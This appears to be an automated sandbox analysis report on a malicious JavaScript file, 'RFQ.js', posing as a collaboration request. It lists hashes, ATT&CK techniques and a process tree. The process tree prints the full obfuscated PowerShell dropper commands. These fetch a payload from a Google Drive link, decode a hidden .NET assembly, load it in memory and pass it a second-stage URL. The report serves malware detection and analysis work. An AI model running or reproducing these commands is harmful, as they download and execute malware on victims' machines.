397c1cb5536c84ebaf2ab511cf4183be4364ed6619c0bfaf2ac816a99ec49a4a

General

Target

Collaboration Request/RFQ.js
Size

15KB
MD5

e1b56b06f44512e79ce26a1db4958fa0
SHA1

5c0a3a02fd37d85330012ac27ee59cd05466f866
SHA256

943e6c8dd31effd085cd83c1f681d8c2f5d7d1967b34dacfed7ac3db51d60c1b
SHA512

b5a3e3c82a812375da64ad2e7ba3820d9058adc2f5f3d45035984b27dec64451cbd45b547385e7de221e82b01967aff2495d33a826eb0738871c739a27b95770
SSDEEP

384:zktd8aCPI9hUmMLVmdZyukUnRHxHCiDze:QtdhC6hDYmdZKUnRRiiDze

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	3260	wscript.exe
7	3260	wscript.exe
28	4492	powershell.exe
30	4492	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4492	powershell.exe
1800	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	wscript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
25	drive.google.com
28	drive.google.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1800	powershell.exe
1800	powershell.exe
4492	powershell.exe
4492	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 3260 wrote to memory of 1800	3260	wscript.exe	87
PID 3260 wrote to memory of 1800	3260	wscript.exe	87
PID 1800 wrote to memory of 4492	1800	powershell.exe	89
PID 1800 wrote to memory of 4492	1800	powershell.exe	89

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Collaboration Request\RFQ.js"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcASABnAFcAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAKwAnADcAbgBzAGgAdAB0AHAAcwAnACsAJwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAEEASQBWAGcASgBKAEoAdgAxAEYANgB2AFMANABzAFUATwB5AGIAbgBIAC0AcwBEAHYAVQBoAEIAWQB3AHUAcgA3AG4AcwA7AEgAZwBXAHcAZQBiACcAKwAnAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBIAGcAVwBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAEgAZwBXAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAJwArACcAKABIAGcAVwBpACcAKwAnAG0AYQBnAGUAJwArACcAVQByAGwAKQA7AEgAZwBXAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgAnACsAJwBHAGUAdABTAHQAJwArACcAcgBpAG4AZwAoAEgAZwBXAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AEgAZwBXAHMAdABhAHIAdABGAGwAYQBnACAAPQAgADcAbgBzADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4ANwBuAHMAOwBIAGcAVwBlAG4AZABGAGwAYQBnACAAPQAgADcAbgBzADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgA3AG4AcwA7AEgAZwBXAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAASABnAFcAaQBtAGEAZwBlAFQAZQB4AHQAJwArACcALgBJAG4AZABlAHgATwBmACgASABnAFcAcwB0AGEAcgB0AEYAbABhAGcAKQA7AEgAZwBXAGUAbgBkAEkAbgBkAGUAeAAgAD0AIABIAGcAVwBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABIAGcAJwArACcAVwBlAG4AZABGAGwAYQBnACkAOwBIAGcAVwBzAHQAYQByAHQASQBuAGQAZQB4ACcAKwAnACAALQBnAGUAIAAnACsAJwAwACAALQBhAG4AZAAgAEgAZwBXAGUAbgBkAEkAbgBkAGUAeAAgAC0AJwArACcAZwB0ACAASABnAFcAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEgAZwBXAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABIAGcAVwBzAHQAYQByAHQARgBsAGEAZwAuACcAKwAnAEwAZQBuAGcAdABoADsASABnAFcAYgBhACcAKwAnAHMAZQA2ADQATABlAG4AZwB0AGgAJwArACcAIAA9ACAASABnAFcAZQAnACsAJwBuAGQASQBuAGQAZQB4ACAALQAgAEgAZwBXAHMAdABhAHIAdABJAG4AZABlAHgAOwBIAGcAVwBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAEgAZwBXAGkAbQBhACcAKwAnAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABIAGcAJwArACcAVwBzAHQAYQByAHQASQBuAGQAZQB4ACwAIABIAGcAVwBiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsASABnAFcAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgASABnAFcAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABiAEcAcwAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAnACsAJwBIAGcAVwBfACAAfQAnACsAJwApAFsALQAxAC4ALgAtACgASABnAFcAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AEgAZwBXAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2ACcAKwAnAGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABIAGcAVwBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7AEgAZwBXAGwAbwBhAGQAZQBkAEEAcwBzACcAKwAnAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AJwArACcAYQBkACgASABnAFcAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AEgAZwBXAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAJwArACcAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAJwArACcAKAA3AG4AcwBWAEEASQA3AG4AcwApADsASABnAFcAdgBhAGkATQBlAHQAaABvAGQALgAnACsAJwBJAG4AdgBvAGsAZQAoAEgAZwBXAG4AdQBsAGwALAAgAEAAKAAnACsAJwA3AG4AcwB0AHgAdAAuADEAbQB3AHgAeAAnACsAJwAvAHYAdwBlAG4ALwByAGIALgBtAG8AYwAuADUAMAAxAHIAZQAuAG8AbQBsAC8ALwA6AHMAcAB0AHQAaAA3AG4AcwAsACAANwBuAHMAJwArACcAZABlAHMAYQB0AGkAdgBhAGQAbwA3AG4AcwAsACAANwBuAHMAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwA3AG4AcwAsACAANwBuAHMAZABlAHMAYQB0AGkAdgBhAGQAbwA3AG4AcwAsACAANwBuAHMAQwBhAHMAUABvAGwANwBuAHMALAAgADcAbgBzAGQAZQBzAGEAdABpAHYAYQBkAG8ANwBuAHMALAA3AG4AcwBkAGUAcwBhAHQAaQB2AGEAZABvADcAbgBzACwAJwArACcANwBuAHMAZABlAHMAYQB0AGkAdgBhAGQAbwA3AG4AJwArACcAcwAsADcAbgBzAFUAUgBMADcAbgBzACwAIAA3AG4AcwBDADoANABnAFcAUAByAG8AZwByAGEAbQBEAGEAdABhADQAZwBXADcAbgBzACwANwBuAHMAJwArACcAbgBlACcAKwAnAG0AdQA3AG4AcwAsADcAbgBzAGoAcwA3AG4AcwAsADcAbgBzADEANwBuAHMALAA3AG4AcwAxADcAbgBzACkAKQA7ACcAKQAgAC0AQwByAEUAUABMAEEAYwBlACgAWwBjAEgAQQBSAF0AOQA4ACsAWwBjAEgAQQBSAF0ANwAxACsAWwBjAEgAQQBSAF0AMQAxADUAKQAsAFsAYwBIAEEAUgBdADEAMgA0ACAAIAAtAHIAZQBQAEwAQQBjAEUAIAAgACcANABnAFcAJwAsAFsAYwBIAEEAUgBdADkAMgAgACAALQBDAHIARQBQAEwAQQBjAGUAIAAgACgAWwBjAEgAQQBSAF0ANwAyACsAWwBjAEgAQQBSAF0AMQAwADMAKwBbAGMASABBAFIAXQA4ADcAKQAsAFsAYwBIAEEAUgBdADMANgAgAC0AcgBlAFAATABBAGMARQAgACgAWwBjAEgAQQBSAF0ANQA1ACsAWwBjAEgAQQBSAF0AMQAxADAAKwBbAGMASABBAFIAXQAxADEANQApACwAWwBjAEgAQQBSAF0AMwA5ACkAfAAuACgAIAAkAFAAUwBoAG8AbQBlAFsANABdACsAJABwAFMASABvAE0AZQBbADMAMABdACsAJwBYACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('HgWimageUrl = '+'7nshttps'+'://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur7ns;HgWweb'+'Client = New-Object System.Net.WebClient;HgWimageBytes = HgWwebClient.DownloadData'+'(HgWi'+'mage'+'Url);HgWimageText = [Syst'+'em.Text.Encoding]::UTF8.'+'GetSt'+'ring(HgWimageBytes);HgWstartFlag = 7ns<<BASE64_START>>7ns;HgWendFlag = 7ns<<BASE64_END>>7ns;HgWstartIndex = HgWimageText'+'.IndexOf(HgWstartFlag);HgWendIndex = HgWimageText.IndexOf(Hg'+'WendFlag);HgWstartIndex'+' -ge '+'0 -and HgWendIndex -'+'gt HgWstartIndex;HgWstartIndex += HgWstartFlag.'+'Length;HgWba'+'se64Length'+' = HgWe'+'ndIndex - HgWstartIndex;HgWbase64Command = HgWima'+'geText.Substring(Hg'+'WstartIndex, HgWbase64Length);HgWbase64Reversed = -join (HgWbase64Command.ToCharArray() bGs ForEach-Object { '+'HgW_ }'+')[-1..-(HgWbase64Command.Length)];HgWcommandBytes = [System.Conv'+'ert]::FromBase64String(HgWbase64Reversed);HgWloadedAss'+'embly = [System.Reflecti'+'on.Assembly]::Lo'+'ad(HgWcommandBytes);HgWvaiMethod = [dnl'+'ib.IO.Home].GetMethod'+'(7nsVAI7ns);HgWvaiMethod.'+'Invoke(HgWnull, @('+'7nstxt.1mwxx'+'/vwen/rb.moc.501re.oml//:sptth7ns, 7ns'+'desativado7ns, 7nsd'+'esativado7ns, 7nsdesativado7ns, 7nsCasPol7ns, 7nsdesativado7ns,7nsdesativado7ns,'+'7nsdesativado7n'+'s,7nsURL7ns, 7nsC:4gWProgramData4gW7ns,7ns'+'ne'+'mu7ns,7nsjs7ns,7ns17ns,7ns17ns));') -CrEPLAce([cHAR]98+[cHAR]71+[cHAR]115),[cHAR]124 -rePLAcE '4gW',[cHAR]92 -CrEPLAce ([cHAR]72+[cHAR]103+[cHAR]87),[cHAR]36 -rePLAcE ([cHAR]55+[cHAR]110+[cHAR]115),[cHAR]39)|.( $PShome[4]+$pSHoMe[30]+'X')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqexhbc3.hkj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1800-0-0x00007FFB5B3F3000-0x00007FFB5B3F5000-memory.dmp

Filesize
8KB

Download
memory/1800-2-0x00000285E3630000-0x00000285E3652000-memory.dmp

Filesize
136KB

Download
memory/1800-11-0x00007FFB5B3F0000-0x00007FFB5BEB1000-memory.dmp

Filesize
10.8MB

Download
memory/1800-12-0x00007FFB5B3F0000-0x00007FFB5BEB1000-memory.dmp

Filesize
10.8MB

Download
memory/1800-27-0x00007FFB5B3F0000-0x00007FFB5BEB1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing